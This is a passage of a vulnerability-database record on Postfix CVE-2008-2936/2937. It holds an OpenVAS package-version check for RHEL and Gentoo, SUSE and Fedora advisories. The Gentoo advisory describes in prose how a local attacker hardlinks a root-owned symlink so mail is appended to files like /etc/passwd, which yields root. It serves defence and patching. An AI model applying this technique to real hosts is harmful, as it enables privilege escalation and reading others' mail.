under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4,\n Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-August/msg00015.html\");\n script_id(870021);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0839-01\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"RedHat Update for postfix RHSA-2008:0839-01\");\n\n script_summary(\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.3.3~2.1.el5_2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-pflogsumm\", rpm:\"postfix-pflogsumm~2.2.10~1.2.1.el4_7\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postfix-debuginfo\", rpm:\"postfix-debuginfo~2.0.16~14.1.RHEL3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "### Background\n\nPostfix is Wietse Venema's mailer that attempts to be fast, easy to administer, and secure, as an alternative to the widely-used Sendmail program. \n\n### Description\n\nSebastian Krahmer of SuSE has found that Postfix allows to deliver mail to root-owned symlinks in an insecure manner under certain conditions. Normally, Postfix does not deliver mail to symlinks, except to root-owned symlinks, for compatibility with the systems using symlinks in /dev like Solaris. Furthermore, some systems like Linux allow to hardlink a symlink, while the POSIX.1-2001 standard requires that the symlink is followed. Depending on the write permissions and the delivery agent being used, this can lead to an arbitrary local file overwriting vulnerability (CVE-2008-2936). Furthermore, the Postfix delivery agent does not properly verify the ownership of a mailbox before delivering mail (CVE-2008-2937). \n\n### Impact\n\nThe combination of these features allows a local attacker to hardlink a root-owned symlink such that the newly created symlink would be root-owned and would point to a regular file (or another symlink) that would be written by the Postfix built-in local(8) or virtual(8) delivery agents, regardless the ownership of the final destination regular file. Depending on the write permissions of the spool mail directory, the delivery style, and the existence of a root mailbox, this could allow a local attacker to append a mail to an arbitrary file like /etc/passwd in order to gain root privileges. \n\nThe default configuration of Gentoo Linux does not permit any kind of user privilege escalation. \n\nThe second vulnerability (CVE-2008-2937) allows a local attacker, already having write permissions to the mail spool directory which is not the case on Gentoo by default, to create a previously nonexistent mailbox before Postfix creates it, allowing to read the mail of another user on the system. \n\n### Workaround\n\nThe following conditions should be met in order to be vulnerable to local privilege escalation. \n\n * The mail delivery style is mailbox, with the Postfix built-in local(8) or virtual(8) delivery agents.\n * The mail spool directory (/var/spool/mail) is user-writeable.\n * The user can create hardlinks pointing to root-owned symlinks located in other directories.\n\nConsequently, each one of the following workarounds is efficient. \n\n * Verify that your /var/spool/mail directory is not writeable by a user. Normally on Gentoo, only the mail group has write access, and no end-user should be granted the mail group ownership.\n * Prevent the local users from being able to create hardlinks pointing outside of the /var/spool/mail directory, e.g. with a dedicated partition.\n * Use a non-builtin Postfix delivery agent, like procmail or maildrop.\n * Use the maildir delivery style of Postfix (\"home_mailbox=Maildir/\" for example).\n\nConcerning the second vulnerability, check the write permissions of /var/spool/mail, or check that every Unix account already has a mailbox, by using Wietse Venema's Perl script available in the official advisory. \n\n### Resolution\n\nAll Postfix users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/postfix-2.5.3-r1\"", "edition": 1, "modified": "2008-10-23T00:00:00", "published": "2008-08-14T00:00:00", "id": "GLSA-200808-12", "href": "https://security.gentoo.org/glsa/200808-12", "type": "gentoo", "title": "Postfix: Local privilege escalation vulnerability", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "Postfix is a well known MTA. During a source code audit the SuSE Security-Team discovered a local privilege escalation bug (CVE-2008-2936) as well as a mailbox ownership problem (CVE-2008-2937) in postfix. The first bug allowed local users to execute arbitrary commands as root while the second one allowed local users to read other users mail.\n#### Solution\nPlease install the update package.", "edition": 1, "modified": "2008-08-14T14:39:29", "published": "2008-08-14T14:39:29", "id": "SUSE-SA:2008:040", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00002.html", "type": "suse", "title": "local privilege escalation in postfix", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:31:27", "published": "2008-10-09T21:31:27", "id": "FEDORA:5F8CF208974", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: postfix-2.5.5-1.fc8", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936", "CVE-2008-2937", "CVE-2008-3889"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL), TLS ", "modified": "2008-10-09T21:33:24", "published": "2008-10-09T21:33:24", "id": "FEDORA:71804208749", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: postfix-2.5.5-1.fc9", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}]}